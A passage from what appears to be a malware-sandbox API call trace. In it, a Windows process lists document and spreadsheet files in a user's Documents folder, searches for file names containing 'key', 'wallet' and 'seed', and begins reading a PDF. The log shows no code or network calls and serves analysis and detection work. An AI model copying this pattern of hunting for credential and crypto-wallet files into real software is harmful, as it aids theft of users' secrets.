lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.205] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b26ad0, ftCreationTime.dwHighDateTime=0x1d7878f, ftLastAccessTime.dwLowDateTime=0x2be7da40, ftLastAccessTime.dwHighDateTime=0x1d793ce, ftLastWriteTime.dwLowDateTime=0x2be7da40, ftLastWriteTime.dwHighDateTime=0x1d793ce, nFileSizeHigh=0x0, nFileSizeLow=0xf6bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oraah1hNv81.docx", cAlternateFileName="ORAAH1~1.DOC")) returned 0x76a908 [0217.205] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a1c0, ftCreationTime.dwHighDateTime=0x1d7c91f, ftLastAccessTime.dwLowDateTime=0x5dfc3490, ftLastAccessTime.dwHighDateTime=0x1d7c9a7, ftLastWriteTime.dwLowDateTime=0x5dfc3490, ftLastWriteTime.dwHighDateTime=0x1d7c9a7, nFileSizeHigh=0x0, nFileSizeLow=0x174af, dwReserved0=0x0, dwReserved1=0x0, cFileName="QIi5dKHoe7d4T0I8AD.docx", cAlternateFileName="QII5DK~1.DOC")) returned 1 [0217.205] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5de5530, ftCreationTime.dwHighDateTime=0x1d79e51, ftLastAccessTime.dwLowDateTime=0x81b1ab60, ftLastAccessTime.dwHighDateTime=0x1d7b410, ftLastWriteTime.dwLowDateTime=0x81b1ab60, ftLastWriteTime.dwHighDateTime=0x1d7b410, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="QZJHA 5.docx", cAlternateFileName="QZJHA5~1.DOC")) returned 1 [0217.206] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19210d40, ftCreationTime.dwHighDateTime=0x1d7be95, ftLastAccessTime.dwLowDateTime=0x1ce836d0, ftLastAccessTime.dwHighDateTime=0x1d7bfe7, ftLastWriteTime.dwLowDateTime=0x1ce836d0, ftLastWriteTime.dwHighDateTime=0x1d7bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x17bf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ssx9X8TqMo7l4y6fOJ.docx", cAlternateFileName="SSX9X8~1.DOC")) returned 1 [0217.206] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59ccd350, ftCreationTime.dwHighDateTime=0x1d7e0bf, ftLastAccessTime.dwLowDateTime=0xb86cb290, ftLastAccessTime.dwHighDateTime=0x1d7e4d4, ftLastWriteTime.dwLowDateTime=0xb86cb290, ftLastWriteTime.dwHighDateTime=0x1d7e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x79d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="YJrlqSzeXnA.docx", cAlternateFileName="YJRLQS~1.DOC")) returned 1 [0217.206] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0217.206] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0217.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.207] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.207] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7549ad20, ftCreationTime.dwHighDateTime=0x1d79938, ftLastAccessTime.dwLowDateTime=0x6ad49ed0, ftLastAccessTime.dwHighDateTime=0x1d7e335, ftLastWriteTime.dwLowDateTime=0x6ad49ed0, ftLastWriteTime.dwHighDateTime=0x1d7e335, nFileSizeHigh=0x0, nFileSizeLow=0x160ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="gZN4L.xlsx", cAlternateFileName="GZN4L~1.XLS")) returned 0x76a908 [0217.207] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95e68890, ftCreationTime.dwHighDateTime=0x1d7dba1, ftLastAccessTime.dwLowDateTime=0x9afa2750, ftLastAccessTime.dwHighDateTime=0x1d7e49e, ftLastWriteTime.dwLowDateTime=0x9afa2750, ftLastWriteTime.dwHighDateTime=0x1d7e49e, nFileSizeHigh=0x0, nFileSizeLow=0x18a56, dwReserved0=0x0, dwReserved1=0x0, cFileName="HEibir9NnU16o.xlsx", cAlternateFileName="HEIBIR~1.XLS")) returned 1 [0217.207] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8db5570, ftCreationTime.dwHighDateTime=0x1d79cb3, ftLastAccessTime.dwLowDateTime=0xd33b9190, ftLastAccessTime.dwHighDateTime=0x1d79f9c, ftLastWriteTime.dwLowDateTime=0xd33b9190, ftLastWriteTime.dwHighDateTime=0x1d79f9c, nFileSizeHigh=0x0, nFileSizeLow=0x12f4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ojE VKo4d6A0cKjlKcS.xlsx", cAlternateFileName="OJEVKO~1.XLS")) returned 1 [0217.207] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x350aec00, ftCreationTime.dwHighDateTime=0x1d7dde0, ftLastAccessTime.dwLowDateTime=0x5754a400, ftLastAccessTime.dwHighDateTime=0x1d7e096, ftLastWriteTime.dwLowDateTime=0x5754a400, ftLastWriteTime.dwHighDateTime=0x1d7e096, nFileSizeHigh=0x0, nFileSizeLow=0x9026, dwReserved0=0x0, dwReserved1=0x0, cFileName="OKmk8I 8.xlsx", cAlternateFileName="OKMK8I~1.XLS")) returned 1 [0217.208] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72842660, ftCreationTime.dwHighDateTime=0x1d7cdef, ftLastAccessTime.dwLowDateTime=0x6e8ec480, ftLastAccessTime.dwHighDateTime=0x1d7e491, ftLastWriteTime.dwLowDateTime=0x6e8ec480, ftLastWriteTime.dwHighDateTime=0x1d7e491, nFileSizeHigh=0x0, nFileSizeLow=0x74b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pPsiR-hK.xlsx", cAlternateFileName="PPSIR-~1.XLS")) returned 1 [0217.208] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfade8d0, ftCreationTime.dwHighDateTime=0x1d79450, ftLastAccessTime.dwLowDateTime=0x6d24b760, ftLastAccessTime.dwHighDateTime=0x1d7d5a2, ftLastWriteTime.dwLowDateTime=0x6d24b760, ftLastWriteTime.dwHighDateTime=0x1d7d5a2, nFileSizeHigh=0x0, nFileSizeLow=0x444b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zO0R7X8yiTCHz9z6m9mt.xlsx", cAlternateFileName="ZO0R7X~1.XLS")) returned 1 [0217.208] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0217.208] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0217.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.209] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.209] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7549ad20, ftCreationTime.dwHighDateTime=0x1d79938, ftLastAccessTime.dwLowDateTime=0x6ad49ed0, ftLastAccessTime.dwHighDateTime=0x1d7e335, ftLastWriteTime.dwLowDateTime=0x6ad49ed0, ftLastWriteTime.dwHighDateTime=0x1d7e335, nFileSizeHigh=0x0, nFileSizeLow=0x160ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="gZN4L.xlsx", cAlternateFileName="GZN4L~1.XLS")) returned 0x76a908 [0217.209] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95e68890, ftCreationTime.dwHighDateTime=0x1d7dba1, ftLastAccessTime.dwLowDateTime=0x9afa2750, ftLastAccessTime.dwHighDateTime=0x1d7e49e, ftLastWriteTime.dwLowDateTime=0x9afa2750, ftLastWriteTime.dwHighDateTime=0x1d7e49e, nFileSizeHigh=0x0, nFileSizeLow=0x18a56, dwReserved0=0x0, dwReserved1=0x0, cFileName="HEibir9NnU16o.xlsx", cAlternateFileName="HEIBIR~1.XLS")) returned 1 [0217.209] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8db5570, ftCreationTime.dwHighDateTime=0x1d79cb3, ftLastAccessTime.dwLowDateTime=0xd33b9190, ftLastAccessTime.dwHighDateTime=0x1d79f9c, ftLastWriteTime.dwLowDateTime=0xd33b9190, ftLastWriteTime.dwHighDateTime=0x1d79f9c, nFileSizeHigh=0x0, nFileSizeLow=0x12f4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ojE VKo4d6A0cKjlKcS.xlsx", cAlternateFileName="OJEVKO~1.XLS")) returned 1 [0217.210] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x350aec00, ftCreationTime.dwHighDateTime=0x1d7dde0, ftLastAccessTime.dwLowDateTime=0x5754a400, ftLastAccessTime.dwHighDateTime=0x1d7e096, ftLastWriteTime.dwLowDateTime=0x5754a400, ftLastWriteTime.dwHighDateTime=0x1d7e096, nFileSizeHigh=0x0, nFileSizeLow=0x9026, dwReserved0=0x0, dwReserved1=0x0, cFileName="OKmk8I 8.xlsx", cAlternateFileName="OKMK8I~1.XLS")) returned 1 [0217.210] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72842660, ftCreationTime.dwHighDateTime=0x1d7cdef, ftLastAccessTime.dwLowDateTime=0x6e8ec480, ftLastAccessTime.dwHighDateTime=0x1d7e491, ftLastWriteTime.dwLowDateTime=0x6e8ec480, ftLastWriteTime.dwHighDateTime=0x1d7e491, nFileSizeHigh=0x0, nFileSizeLow=0x74b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pPsiR-hK.xlsx", cAlternateFileName="PPSIR-~1.XLS")) returned 1 [0217.210] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfade8d0, ftCreationTime.dwHighDateTime=0x1d79450, ftLastAccessTime.dwLowDateTime=0x6d24b760, ftLastAccessTime.dwHighDateTime=0x1d7d5a2, ftLastWriteTime.dwLowDateTime=0x6d24b760, ftLastWriteTime.dwHighDateTime=0x1d7d5a2, nFileSizeHigh=0x0, nFileSizeLow=0x444b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zO0R7X8yiTCHz9z6m9mt.xlsx", cAlternateFileName="ZO0R7X~1.XLS")) returned 1 [0217.210] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0217.211] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0217.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.211] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.211] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.212] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.212] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b26ad0, ftCreationTime.dwHighDateTime=0x1d7878f, ftLastAccessTime.dwLowDateTime=0x2be7da40, ftLastAccessTime.dwHighDateTime=0x1d793ce, ftLastWriteTime.dwLowDateTime=0x2be7da40, ftLastWriteTime.dwHighDateTime=0x1d793ce, nFileSizeHigh=0x0, nFileSizeLow=0xf6bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oraah1hNv81.docx", cAlternateFileName="ORAAH1~1.DOC")) returned 0x76a908 [0217.213] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a1c0, ftCreationTime.dwHighDateTime=0x1d7c91f, ftLastAccessTime.dwLowDateTime=0x5dfc3490, ftLastAccessTime.dwHighDateTime=0x1d7c9a7, ftLastWriteTime.dwLowDateTime=0x5dfc3490, ftLastWriteTime.dwHighDateTime=0x1d7c9a7, nFileSizeHigh=0x0, nFileSizeLow=0x174af, dwReserved0=0x0, dwReserved1=0x0, cFileName="QIi5dKHoe7d4T0I8AD.docx", cAlternateFileName="QII5DK~1.DOC")) returned 1 [0217.213] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5de5530, ftCreationTime.dwHighDateTime=0x1d79e51, ftLastAccessTime.dwLowDateTime=0x81b1ab60, ftLastAccessTime.dwHighDateTime=0x1d7b410, ftLastWriteTime.dwLowDateTime=0x81b1ab60, ftLastWriteTime.dwHighDateTime=0x1d7b410, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="QZJHA 5.docx", cAlternateFileName="QZJHA5~1.DOC")) returned 1 [0217.213] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19210d40, ftCreationTime.dwHighDateTime=0x1d7be95, ftLastAccessTime.dwLowDateTime=0x1ce836d0, ftLastAccessTime.dwHighDateTime=0x1d7bfe7, ftLastWriteTime.dwLowDateTime=0x1ce836d0, ftLastWriteTime.dwHighDateTime=0x1d7bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x17bf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ssx9X8TqMo7l4y6fOJ.docx", cAlternateFileName="SSX9X8~1.DOC")) returned 1 [0217.213] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59ccd350, ftCreationTime.dwHighDateTime=0x1d7e0bf, ftLastAccessTime.dwLowDateTime=0xb86cb290, ftLastAccessTime.dwHighDateTime=0x1d7e4d4, ftLastWriteTime.dwLowDateTime=0xb86cb290, ftLastWriteTime.dwHighDateTime=0x1d7e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x79d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="YJrlqSzeXnA.docx", cAlternateFileName="YJRLQS~1.DOC")) returned 1 [0217.213] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0217.213] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0217.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.214] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.214] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.215] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.215] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.216] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.216] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.217] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", lpFilePart=0x0) returned 0x27 [0217.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0217.217] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\pzwvtv.pdf"), fInfoLevelId=0x0, lpFileInformation=0x25cd7e4 | out: lpFileInformation=0x25cd7e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9aa1e0, ftCreationTime.dwHighDateTime=0x1d7e152, ftLastAccessTime.dwLowDateTime=0xe9959da0, ftLastAccessTime.dwHighDateTime=0x1d7e295, ftLastWriteTime.dwLowDateTime=0xe9959da0, ftLastWriteTime.dwHighDateTime=0x1d7e295, nFileSizeHigh=0x0, nFileSizeLow=0xae0f)) returned 1 [0217.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0217.218] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0217.218] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", lpFilePart=0x0) returned 0x27 [0217.218] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", lpFilePart=0x0) returned 0x27 [0217.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0217.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\pzwvtv.pdf"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9aa1e0, ftCreationTime.dwHighDateTime=0x1d7e152, ftLastAccessTime.dwLowDateTime=0xe9959da0, ftLastAccessTime.dwHighDateTime=0x1d7e295, ftLastWriteTime.dwLowDateTime=0xe9959da0, ftLastWriteTime.dwHighDateTime=0x1d7e295, nFileSizeHigh=0x0, nFileSizeLow=0xae0f)) returned 1 [0217.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0217.219] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf", lpFilePart=0x0) returned 0x27 [0217.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0217.219] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\PZWvtV.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\pzwvtv.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0217.219] GetFileType (hFile=0x354) returned 0x1 [0217.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0217.219] GetFileType (hFile=0x354) returned 0x1 [0217.220] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.221] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.221] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.222] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.222] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0217.222] ReadFile (in: hFile=0x354, lpBuffer=0x25cea44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25cea44*, lpNumberOfBytesRead=0x36f214*=0x1000, 